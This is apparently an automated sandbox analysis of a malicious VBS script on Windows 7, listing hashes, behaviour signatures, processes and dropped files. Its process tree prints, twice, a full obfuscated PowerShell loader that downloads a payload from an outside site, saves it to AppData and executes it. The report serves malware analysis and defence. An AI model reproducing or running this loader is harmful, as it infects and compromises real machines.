Overview

overview

8

Static

static

1

67b9457331...c8.vbs

windows7-x64

8

67b9457331...c8.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    02-10-2024 01:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    67b9457331d029200f00205c11632fbbf7aa3b338d2eafd274c4c80f5c26c4c8.vbs

  • Size

    14KB

  • MD5

    9f4e60a4a510aab2d96525ee51d7f858

  • SHA1

    c86b0f087b561b3eee0b97ba4435ee5c58b3b472

  • SHA256

    67b9457331d029200f00205c11632fbbf7aa3b338d2eafd274c4c80f5c26c4c8

  • SHA512

    311262488885b079b78faa131a716d02a5d1241d8867f220cdef0b7b9f1f35ab76d384f47a937e5ad929966ba8517209d955060a8342501e03e17042800cfcfb

  • SSDEEP

    192:vvJG3VsTxLRtkuUx0mbWw6Xgs4Zcx2dqnZ+d1AN0O5Tv4Khz2TGrRDxRZM:m4xRedxBr6LELdkZP0O574KdGYRDxRO

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\67b9457331d029200f00205c11632fbbf7aa3b338d2eafd274c4c80f5c26c4c8.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1852
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping 6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\system32\PING.EXE
        ping 6777.6777.6777.677e
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Outvoting Hjemefter Overstadigstes #>;$Prciseringsdelens='Hawkshaws';<#Pantefogederne Skiferolierne Blousonjakkens Lierne #>;$Biconnectivity126=$host.PrivateData;If ($Biconnectivity126) {$Anadipsic++;}function Direktionsteknikkerne($Selvglades){$Femkmpers=$Padderokker+$Selvglades.Length-$Anadipsic;for( $Houndsbane=7;$Houndsbane -lt $Femkmpers;$Houndsbane+=8){$Workday='Daltonist';$Grundstrukturernes+=$Selvglades[$Houndsbane];}$Grundstrukturernes;}function unvigorous($Rectostomy11){ . ($Osmious) ($Rectostomy11);}$Forhrer=Direktionsteknikkerne 'UnincarMInt rvaoSultestz Udnvnei InauthlRgenskjl Si adkaBrum,ed/Selekti5Ebel of.Statism0Antirad Iowans(OpdrageWBumblefiFremescnHachisedZoroa.to HatbruwNri gersNaalef, Liede.kNDumpingTRapseri Kvaksa1Brandst0 klogel. ultitu0 Syndfl;Avispos RadiomeW Rgnes i gudfarnKupello6Ledsage4Undivab;Electr. SplenorxNonedif6Muri id4Corymbb;Confect Em,yrerGelotosvDollopi:Saunter1Nednorm2Grossis1Ritarda.Pho.eni0 Cohesi) Srvers ParabioGOvernate Puddinc OplysnkradiolioKommand/Rapsodi2,uplica0Milords1Armstol0Basisgr0uncanon1Bridgel0Qophsai1Fragtvo AfrejseFVersai i reterorTop laseMuns erfFiske toHuzzrudx Neglek/Afbryde1Rummete2 hronol1 Bevise.Omsttel0 Inform ';$Nedbryder33=Direktionsteknikkerne 'Dis.ortU estlinSCompatiE CessanR Lammen-F lsummaNonla egJa.anidEHonorernJernbantNinetyf ';$Persuadableness=Direktionsteknikkerne 'Tilinteh Bessemt unctivta bejdspStam af:Asbestd/Dekante/Borsyr wF wereuw Ferm nwBosloda.MicolitoNumre rs Unbi.uo yanogedEtvrelseUnpoddecEnolsf,opa.turerStarfis.HomeriscArbejdeoPels gemTransve/hu ligeES rbirknTiddleydUnsullivLeukocyiLitotisdBakerlie EtruskrOmentaue.pgaven.T neabljE tomorpShamablbOperati ';$Aspermous=Direktionsteknikkerne 'Stikke.>cypridi ';$Osmious=Direktionsteknikkerne ' Oligo.istavefoeToksiolXUnind g ';$Tingesterne='Tmrervrkstederne';$Femininernes='\styrtflyverens.Com';unvigorous (Direktionsteknikkerne 'xenoman$ patiumgPhocenilHo edheoAtommisb Sanet.aRehashrlSupport: RemoraJ ovedbeafhstnieLveman rRlingsap toppenrSmagssao,xplodioK njunkfstarves=Anklag $Lib dineKammertnBa.yticvGreekis:IckierpafinflelpAnkermnp Purlied GluteoaSagrasktOp elinaBesyngc+Hierony$ hundeaFAyurvedeUnsy thmg,neraliextrovenRendejeiFremkalnUndervge Espierr BaandsnCacothyePreylunsBhuta.f ');unvigorous (Direktionsteknikkerne ' Beta i$Blomstrg HoldinlUnobligoDigterebm,squasaDenitr lSagaies:Seteau,AUnta gerDiskotetStylidieUdvid lfFormulaaIndorsecoxidatitDiletta=Tribuna$ tiftmPStenpikeLakefror Neu rasuntapesuSkidengaSpor sfdRejsninaTylaripbAntilibl.tationeKautionnAquascueUnanatos Illittstrent,p.Onewh rsCervicopVenulaalRobaadei Tykmlkt Ven,et( Bairnl$FerdytrAdknin ssMagtspipProteoleBindestrUnazotimFountaioSincereuattribushj,rter)Firma.t ');unvigorous (Direktionsteknikkerne ' Submic[Ubeskr NSonnerae Overe tpragtek.Tevan sS elvinse skumgurUn,asuavEliphali TilraacIndivide oatwrPGallworoVextfuriDiscobonCinc.ontAnemat.M rumenta RevselnGru mora A stedgBlodsereSemielar Unshri]Skurkag:Lyse,lu:InclusiSObservaeUrstrukc FranchuPedi.str Rapa.diA,desittKirkefeyhamicifPPrint crUdlbsdaoStrmpest orvansoSprog rcAlumi.so Optionl Flerbr Insultp=Skryded Moerkla[Stra,dlNSprgerseBarenestNoviceh.LustihoS In,onfeCzarinacunissuauFfeanerrR,stateiRadi thtTvivlstyRicinulPChuffinr UdmaaloTrisdemt onartio inepencMano shoFlegmatlDrypninTS,yringy RundtepSpiricleRithasu] stordr:Opdyrke:IkendteTLillypilTjene tsPreadju1 Ve ern2pallets ');$Persuadableness=$Artefact[0];$Nixy=(Direktionsteknikkerne ' Rendem$ Refle.GStrin.eL Nul unoAdresseBMetabasaCostopnlDiffusr: BekrftrGesjftieAntik.noBo ilyrRSkrsommG.ircumiASennepsNSupputaiEscropuZ heliaceSupernoRFootsor=RestricNRetrofrEelectlywStier e-.dmeldeoDevitalBLinie.oJUpa klae.ygerenCUnrelentMassas Bru.alisMucocelyBehol.nsOut,ipet EpimanEIwist,nMOlivers.Tilfae nHoved iEIsoim uTAntwise.Kex safwNedtrapEKommuniBBr dergCEndosseLbestvesICanafiseEvaporeNopedeldTmovanta ');unvigorous ($Nixy);unvigorous (Direktionsteknikkerne ' Did sd$Lopemanr Sp rmaeLazar,noBardehvrGeneralgSyst,mkaBarselsndes,rveiBebledsz P,rsuaeUpchuckrKapsels. BrethrHHemimetezonelovaDissu,td Brnegle GrabberOrdainmsUndertr[Rinning$Dont,orNbrunj.reUndertadAnamniobIndonesr Ti.eliyB,ndbredUnfiledeEjerbolrAfhring3atrof e3 Reserv]Tribuna=Carpetb$E endomFVermuttoKominutr Agriseh askinsrPygmyiseAnanforr G,upus ');$Fluers=Direktionsteknikkerne ' Progra$RototilrFaredove,dellatoKommunir meeringPunishaaR dactenNara iniA.ventszZoophyteConfabur Forfat.Bu rnetD Star,toPirogiewElectronLingvislMonometoMiljfora Adia.odPoly hyFhystreni AntabulW,thnimeHsienjo( Reside$Pr.nsesP Forv.leGestaemrWinn blsDa deliuAnseenda Waylayd PrologaPortmanbSoork mlFor,alteUdsanernSk ndbie DommersSys emasDowntur,Pyrolad$ PosttuSFllesnocBa.tiesrkulturgeMeoubyeeCh,nkedcCrushi hmoutheriBefumean OutcragSyersdi)P litia ';$Screeching=$Jeerproof;unvigorous (Direktionsteknikkerne 'Smalfil$ OlofssgTremuloLLcd ernoMete.rsBQuartodAhy ostalStarwor:Soupspos fsvrgeES.illevrGun.ighmRescorioDastu.iNSupercaeFugtight GinerstAmerismI Saganen Konfuno Antil.=B keres( idflowtMe lideeSlopworSAttaskst Gother- Ra iokpDisvisaAOhoynontR xenkaH Sojabn Pliedb $Idref rsAm hitrC SaladerBiedeinePr.inveeRestoracKataphoHN.nadapiTnde adN ogistgTiltal.)Decentr ');while (!$Sermonettino) {unvigorous (Direktionsteknikkerne ' Bogbin$U inekrg Sew.ngl Rn.ebroPokeroobUngentlaEllekral stj rn: JukeboO S rmerxDukkefryEscall pQuaternhStvbo dyFlle.falBinderilSpejlggoIncreasu Hekt lsUnmoldy= No dif$Corrie t Le nedrChrysopu legisela work ') ;unvigorous $Fluers;unvigorous (Direktionsteknikkerne ' nobsceS latinatUnhumbuaStrutskr Gizzent mskift-PsychotSc anizilMontageein rafteKedel,ap Misinf Sumatr 4 Torsec ');unvigorous (Direktionsteknikkerne 'Leptoth$ Prodrogpycn atlRemitteo.orrettb Soda.laSynkroslAffalds: RampleSnonimpae appoggrYennedsm Tran loKap.llanGnaverie ,onenetNiddicktD midiaiIndfoednReawakeoEtikett= Purgam(LivscykTEmbryoeeBaadf rsMutilattTrngtes-KarreenPPolysemaNarkosatHov,dgrh I,deks Slopmak$PromethSLi teracSdebad.rFor undeStaldbred pingucExcept hFyrepaniM,dtpunn aanedsgAvi eri)Teenage ') ;unvigorous (Direktionsteknikkerne 'jussive$MafiaergCanoniclEmp,isooUdkonkubr acknoaMedlberlForhold:Spr gtaDIdiosepoD namotl MolalalAbrik.saat mismrtvrstilgDisklikrInter aiAkseltanUdloe eeArgumentInobscusdominat=Schi vo$LatisepgHerrin l ongbowo UnmilibKingliea HypnotlDerange: LungebFHyperreoOperatrrMatroseeKomplotdSideordePriod ntOrddanneBetyde.rAlder rmBlatespiSecohmunMejerenaBierekst Flin iiStu saioMisre onLav ndl+Underpr+Old.fdr%Subsulp$Bary,paA ExemptrPseudoctSubprofeRecaginfMaintaiaM saltecH adphot Realit.Ouagad,cElatrenoAntiloqu yretpanSca,euptUdrykke ') ;$Persuadableness=$Artefact[$Dollargrinets];}$Dematerialiseret=301784;$Selsparks=33320;unvigorous (Direktionsteknikkerne 'Counter$C iaroogUvirkellSklds roAwardeeblangturaAnathemlSkrema,:DctnortSz.btievuNonconjpSol urveDesandsrUnw.ighoHarbor pOverst pNuanceroResizins Flugtsi Co,turtSamsvariAnaeroboUdsgtinnSmk aas Omko.tn=Pagodsb oasterGPlatyhieEtaterstAnti xi- .rebapCDetinuio Fi ucinQuiverit MarquieLsekredn haracttLifsfir K mmune$entrepoS Archegc ebukeprFo kulle Blom.te Sm llfcTorturhhMisallyiProphesn HelhedgPrediss ');unvigorous (Direktionsteknikkerne 'Skyldne$Svikke.g,embrall Pestbeo ChlorabBrugerkaMelle,hlTilfor :QuiresfS Agnosipeuropeao NonconrAkkordeoRogue,hdMenthyle ChallarHersk,bmQuak,rd Opulent=Culpame Direct[Oxime eSInsigniyEftermisOverdeltUnitackeCy.lostmFraf.yt.PollakiCAxh mmeo InterlnOmformuv Hexa.yeBoltyprrmolded tP dikat]H,ltids:Overemo:Popu.rtF PaaskrrSponsoroTresi dm ostdatBlyremana T,llursNaturale Fyrbaa6Maerkef4UntissuSUnpersotErhve,vrUident,i Opmun nTilregngTitilla(Brud rn$ RumbliSSkandinuGgegul pFeminateIntercar kubbenoSladderpsynlighpFremtrdoLunu atsPlasmoni aksledtUnde poiGutte eo.ugedeinDessin )midters ');unvigorous (Direktionsteknikkerne 'Tawings$OverbbogC ashwolas,rogaoMuckslib.forsvaa Fornyel Disres:NysesadCUn eroca Haartom,ykkelseB urgognfiske iea,hrodisStorlad befordr=Discomf nyor.n[Reink rSExtempoyIsolatisHaglbygtsu.serue,rebesdmBlennop.Pr portTSubtileeBrand.tx VitriotN.nmeat.Progra.E ReimagnBoghandc Keb oco U,holdd Udlgsfi tempeln RegiongPulveri]Viaduct:Ulrikka:Rad,kalASyden eSReckernCR.adaptI NonaroI Ul ses.BodestrGSkriv leR,ndeddtZoo hilSTumul ttRigholdrTypograiunco,ven FatamogUndulat(Parsiis$ArabertS Unpas.pRhamnacoOpkoblir Miasm oa,dampedBedtvaaeProjektr F.yerbmFaible.)Ud ejse ');unvigorous (Direktionsteknikkerne 'Krigsti$SloshiegUnagglolIdi tiso Uncanob .prednaWhirlpulBolduq.:AngerleIMono ornS urepudBimpe esnemophikDiskontr Inscr pNgtereneAftrrinlserpents viv cie PlainsrReblocknPrse vaeTimernesSmiderc=Politii$ rbuscCpalisadaAt miesmCapern e PlosiongravmoneTerpentsPor sco.Dynamets ansireuUgeskr bRaflendsFleshint BymidtrKontoraiStaal rn Dr bssgConvect(Csarism$ ArborsDUnregaieo ganicmLommepeaFdebysatBlephare Thio,nrV sendeiKonkurraLavpasflPredi aiVidjefls NepotieVerd,nsr AlterneIagtt,gt ingles, Arrect$SemiencSpr.pagie,rvrketl Scholas FolkerpUstadiga.ladvogrre resskReversosendo,en)Sponse ');unvigorous $Indskrpelsernes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:400
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Outvoting Hjemefter Overstadigstes #>;$Prciseringsdelens='Hawkshaws';<#Pantefogederne Skiferolierne Blousonjakkens Lierne #>;$Biconnectivity126=$host.PrivateData;If ($Biconnectivity126) {$Anadipsic++;}function Direktionsteknikkerne($Selvglades){$Femkmpers=$Padderokker+$Selvglades.Length-$Anadipsic;for( $Houndsbane=7;$Houndsbane -lt $Femkmpers;$Houndsbane+=8){$Workday='Daltonist';$Grundstrukturernes+=$Selvglades[$Houndsbane];}$Grundstrukturernes;}function unvigorous($Rectostomy11){ . ($Osmious) ($Rectostomy11);}$Forhrer=Direktionsteknikkerne 'UnincarMInt rvaoSultestz Udnvnei InauthlRgenskjl Si adkaBrum,ed/Selekti5Ebel of.Statism0Antirad Iowans(OpdrageWBumblefiFremescnHachisedZoroa.to HatbruwNri gersNaalef, Liede.kNDumpingTRapseri Kvaksa1Brandst0 klogel. ultitu0 Syndfl;Avispos RadiomeW Rgnes i gudfarnKupello6Ledsage4Undivab;Electr. SplenorxNonedif6Muri id4Corymbb;Confect Em,yrerGelotosvDollopi:Saunter1Nednorm2Grossis1Ritarda.Pho.eni0 Cohesi) Srvers ParabioGOvernate Puddinc OplysnkradiolioKommand/Rapsodi2,uplica0Milords1Armstol0Basisgr0uncanon1Bridgel0Qophsai1Fragtvo AfrejseFVersai i reterorTop laseMuns erfFiske toHuzzrudx Neglek/Afbryde1Rummete2 hronol1 Bevise.Omsttel0 Inform ';$Nedbryder33=Direktionsteknikkerne 'Dis.ortU estlinSCompatiE CessanR Lammen-F lsummaNonla egJa.anidEHonorernJernbantNinetyf ';$Persuadableness=Direktionsteknikkerne 'Tilinteh Bessemt unctivta bejdspStam af:Asbestd/Dekante/Borsyr wF wereuw Ferm nwBosloda.MicolitoNumre rs Unbi.uo yanogedEtvrelseUnpoddecEnolsf,opa.turerStarfis.HomeriscArbejdeoPels gemTransve/hu ligeES rbirknTiddleydUnsullivLeukocyiLitotisdBakerlie EtruskrOmentaue.pgaven.T neabljE tomorpShamablbOperati ';$Aspermous=Direktionsteknikkerne 'Stikke.>cypridi ';$Osmious=Direktionsteknikkerne ' Oligo.istavefoeToksiolXUnind g ';$Tingesterne='Tmrervrkstederne';$Femininernes='\styrtflyverens.Com';unvigorous (Direktionsteknikkerne 'xenoman$ patiumgPhocenilHo edheoAtommisb Sanet.aRehashrlSupport: RemoraJ ovedbeafhstnieLveman rRlingsap toppenrSmagssao,xplodioK njunkfstarves=Anklag $Lib dineKammertnBa.yticvGreekis:IckierpafinflelpAnkermnp Purlied GluteoaSagrasktOp elinaBesyngc+Hierony$ hundeaFAyurvedeUnsy thmg,neraliextrovenRendejeiFremkalnUndervge Espierr BaandsnCacothyePreylunsBhuta.f ');unvigorous (Direktionsteknikkerne ' Beta i$Blomstrg HoldinlUnobligoDigterebm,squasaDenitr lSagaies:Seteau,AUnta gerDiskotetStylidieUdvid lfFormulaaIndorsecoxidatitDiletta=Tribuna$ tiftmPStenpikeLakefror Neu rasuntapesuSkidengaSpor sfdRejsninaTylaripbAntilibl.tationeKautionnAquascueUnanatos Illittstrent,p.Onewh rsCervicopVenulaalRobaadei Tykmlkt Ven,et( Bairnl$FerdytrAdknin ssMagtspipProteoleBindestrUnazotimFountaioSincereuattribushj,rter)Firma.t ');unvigorous (Direktionsteknikkerne ' Submic[Ubeskr NSonnerae Overe tpragtek.Tevan sS elvinse skumgurUn,asuavEliphali TilraacIndivide oatwrPGallworoVextfuriDiscobonCinc.ontAnemat.M rumenta RevselnGru mora A stedgBlodsereSemielar Unshri]Skurkag:Lyse,lu:InclusiSObservaeUrstrukc FranchuPedi.str Rapa.diA,desittKirkefeyhamicifPPrint crUdlbsdaoStrmpest orvansoSprog rcAlumi.so Optionl Flerbr Insultp=Skryded Moerkla[Stra,dlNSprgerseBarenestNoviceh.LustihoS In,onfeCzarinacunissuauFfeanerrR,stateiRadi thtTvivlstyRicinulPChuffinr UdmaaloTrisdemt onartio inepencMano shoFlegmatlDrypninTS,yringy RundtepSpiricleRithasu] stordr:Opdyrke:IkendteTLillypilTjene tsPreadju1 Ve ern2pallets ');$Persuadableness=$Artefact[0];$Nixy=(Direktionsteknikkerne ' Rendem$ Refle.GStrin.eL Nul unoAdresseBMetabasaCostopnlDiffusr: BekrftrGesjftieAntik.noBo ilyrRSkrsommG.ircumiASennepsNSupputaiEscropuZ heliaceSupernoRFootsor=RestricNRetrofrEelectlywStier e-.dmeldeoDevitalBLinie.oJUpa klae.ygerenCUnrelentMassas Bru.alisMucocelyBehol.nsOut,ipet EpimanEIwist,nMOlivers.Tilfae nHoved iEIsoim uTAntwise.Kex safwNedtrapEKommuniBBr dergCEndosseLbestvesICanafiseEvaporeNopedeldTmovanta ');unvigorous ($Nixy);unvigorous (Direktionsteknikkerne ' Did sd$Lopemanr Sp rmaeLazar,noBardehvrGeneralgSyst,mkaBarselsndes,rveiBebledsz P,rsuaeUpchuckrKapsels. BrethrHHemimetezonelovaDissu,td Brnegle GrabberOrdainmsUndertr[Rinning$Dont,orNbrunj.reUndertadAnamniobIndonesr Ti.eliyB,ndbredUnfiledeEjerbolrAfhring3atrof e3 Reserv]Tribuna=Carpetb$E endomFVermuttoKominutr Agriseh askinsrPygmyiseAnanforr G,upus ');$Fluers=Direktionsteknikkerne ' Progra$RototilrFaredove,dellatoKommunir meeringPunishaaR dactenNara iniA.ventszZoophyteConfabur Forfat.Bu rnetD Star,toPirogiewElectronLingvislMonometoMiljfora Adia.odPoly hyFhystreni AntabulW,thnimeHsienjo( Reside$Pr.nsesP Forv.leGestaemrWinn blsDa deliuAnseenda Waylayd PrologaPortmanbSoork mlFor,alteUdsanernSk ndbie DommersSys emasDowntur,Pyrolad$ PosttuSFllesnocBa.tiesrkulturgeMeoubyeeCh,nkedcCrushi hmoutheriBefumean OutcragSyersdi)P litia ';$Screeching=$Jeerproof;unvigorous (Direktionsteknikkerne 'Smalfil$ OlofssgTremuloLLcd ernoMete.rsBQuartodAhy ostalStarwor:Soupspos fsvrgeES.illevrGun.ighmRescorioDastu.iNSupercaeFugtight GinerstAmerismI Saganen Konfuno Antil.=B keres( idflowtMe lideeSlopworSAttaskst Gother- Ra iokpDisvisaAOhoynontR xenkaH Sojabn Pliedb $Idref rsAm hitrC SaladerBiedeinePr.inveeRestoracKataphoHN.nadapiTnde adN ogistgTiltal.)Decentr ');while (!$Sermonettino) {unvigorous (Direktionsteknikkerne ' Bogbin$U inekrg Sew.ngl Rn.ebroPokeroobUngentlaEllekral stj rn: JukeboO S rmerxDukkefryEscall pQuaternhStvbo dyFlle.falBinderilSpejlggoIncreasu Hekt lsUnmoldy= No dif$Corrie t Le nedrChrysopu legisela work ') ;unvigorous $Fluers;unvigorous (Direktionsteknikkerne ' nobsceS latinatUnhumbuaStrutskr Gizzent mskift-PsychotSc anizilMontageein rafteKedel,ap Misinf Sumatr 4 Torsec ');unvigorous (Direktionsteknikkerne 'Leptoth$ Prodrogpycn atlRemitteo.orrettb Soda.laSynkroslAffalds: RampleSnonimpae appoggrYennedsm Tran loKap.llanGnaverie ,onenetNiddicktD midiaiIndfoednReawakeoEtikett= Purgam(LivscykTEmbryoeeBaadf rsMutilattTrngtes-KarreenPPolysemaNarkosatHov,dgrh I,deks Slopmak$PromethSLi teracSdebad.rFor undeStaldbred pingucExcept hFyrepaniM,dtpunn aanedsgAvi eri)Teenage ') ;unvigorous (Direktionsteknikkerne 'jussive$MafiaergCanoniclEmp,isooUdkonkubr acknoaMedlberlForhold:Spr gtaDIdiosepoD namotl MolalalAbrik.saat mismrtvrstilgDisklikrInter aiAkseltanUdloe eeArgumentInobscusdominat=Schi vo$LatisepgHerrin l ongbowo UnmilibKingliea HypnotlDerange: LungebFHyperreoOperatrrMatroseeKomplotdSideordePriod ntOrddanneBetyde.rAlder rmBlatespiSecohmunMejerenaBierekst Flin iiStu saioMisre onLav ndl+Underpr+Old.fdr%Subsulp$Bary,paA ExemptrPseudoctSubprofeRecaginfMaintaiaM saltecH adphot Realit.Ouagad,cElatrenoAntiloqu yretpanSca,euptUdrykke ') ;$Persuadableness=$Artefact[$Dollargrinets];}$Dematerialiseret=301784;$Selsparks=33320;unvigorous (Direktionsteknikkerne 'Counter$C iaroogUvirkellSklds roAwardeeblangturaAnathemlSkrema,:DctnortSz.btievuNonconjpSol urveDesandsrUnw.ighoHarbor pOverst pNuanceroResizins Flugtsi Co,turtSamsvariAnaeroboUdsgtinnSmk aas Omko.tn=Pagodsb oasterGPlatyhieEtaterstAnti xi- .rebapCDetinuio Fi ucinQuiverit MarquieLsekredn haracttLifsfir K mmune$entrepoS Archegc ebukeprFo kulle Blom.te Sm llfcTorturhhMisallyiProphesn HelhedgPrediss ');unvigorous (Direktionsteknikkerne 'Skyldne$Svikke.g,embrall Pestbeo ChlorabBrugerkaMelle,hlTilfor :QuiresfS Agnosipeuropeao NonconrAkkordeoRogue,hdMenthyle ChallarHersk,bmQuak,rd Opulent=Culpame Direct[Oxime eSInsigniyEftermisOverdeltUnitackeCy.lostmFraf.yt.PollakiCAxh mmeo InterlnOmformuv Hexa.yeBoltyprrmolded tP dikat]H,ltids:Overemo:Popu.rtF PaaskrrSponsoroTresi dm ostdatBlyremana T,llursNaturale Fyrbaa6Maerkef4UntissuSUnpersotErhve,vrUident,i Opmun nTilregngTitilla(Brud rn$ RumbliSSkandinuGgegul pFeminateIntercar kubbenoSladderpsynlighpFremtrdoLunu atsPlasmoni aksledtUnde poiGutte eo.ugedeinDessin )midters ');unvigorous (Direktionsteknikkerne 'Tawings$OverbbogC ashwolas,rogaoMuckslib.forsvaa Fornyel Disres:NysesadCUn eroca Haartom,ykkelseB urgognfiske iea,hrodisStorlad befordr=Discomf nyor.n[Reink rSExtempoyIsolatisHaglbygtsu.serue,rebesdmBlennop.Pr portTSubtileeBrand.tx VitriotN.nmeat.Progra.E ReimagnBoghandc Keb oco U,holdd Udlgsfi tempeln RegiongPulveri]Viaduct:Ulrikka:Rad,kalASyden eSReckernCR.adaptI NonaroI Ul ses.BodestrGSkriv leR,ndeddtZoo hilSTumul ttRigholdrTypograiunco,ven FatamogUndulat(Parsiis$ArabertS Unpas.pRhamnacoOpkoblir Miasm oa,dampedBedtvaaeProjektr F.yerbmFaible.)Ud ejse ');unvigorous (Direktionsteknikkerne 'Krigsti$SloshiegUnagglolIdi tiso Uncanob .prednaWhirlpulBolduq.:AngerleIMono ornS urepudBimpe esnemophikDiskontr Inscr pNgtereneAftrrinlserpents viv cie PlainsrReblocknPrse vaeTimernesSmiderc=Politii$ rbuscCpalisadaAt miesmCapern e PlosiongravmoneTerpentsPor sco.Dynamets ansireuUgeskr bRaflendsFleshint BymidtrKontoraiStaal rn Dr bssgConvect(Csarism$ ArborsDUnregaieo ganicmLommepeaFdebysatBlephare Thio,nrV sendeiKonkurraLavpasflPredi aiVidjefls NepotieVerd,nsr AlterneIagtt,gt ingles, Arrect$SemiencSpr.pagie,rvrketl Scholas FolkerpUstadiga.ladvogrre resskReversosendo,en)Sponse ');unvigorous $Indskrpelsernes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2556

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HTEFFJMTI72B200DINR7.temp
    Filesize

    7KB

    MD5

    cad9d29826af87447e32a287b9fa6ab1

    SHA1

    248a0fcec0be09a69349915784158786641df62b

    SHA256

    84fa7f9ad527f8cb275aed01d699f744c0757a5640b3fe4f6d7af5dbf459ecb1

    SHA512

    cbc5a56773dd44fff0416383906f87493e190b3102c54971cc793b32e0c69156a686fdc34a3ed4f492aaf21a13d2aff6ab345de8147f71bf9f7b4b3f4642893a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\styrtflyverens.Com
    Filesize

    436KB

    MD5

    37219638188fe9f2f413fca0d54c45c0

    SHA1

    1ffa11654406a690e2bdcbe119eabfca0f70789d

    SHA256

    76302ac89cd7c1b70aad37fa73fce1a6412821117db2106d9e8a01118d75972c

    SHA512

    2b995069f5746f2954702726e5de58c1e924f3f39b95e4a8b6337efa36d946dde97fc445a06eb61ef99ac42a4838078c0aaa72dd9d288d3f3f8d143fca536cfc

    Download Submit

  • memory/400-10-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/400-7-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/400-8-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/400-11-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/400-4-0x000007FEF657E000-0x000007FEF657F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/400-9-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/400-13-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/400-14-0x000007FEF657E000-0x000007FEF657F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/400-16-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/400-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/400-5-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2556-20-0x0000000006600000-0x0000000007869000-memory.dmp

    Filesize

    18.4MB

    Download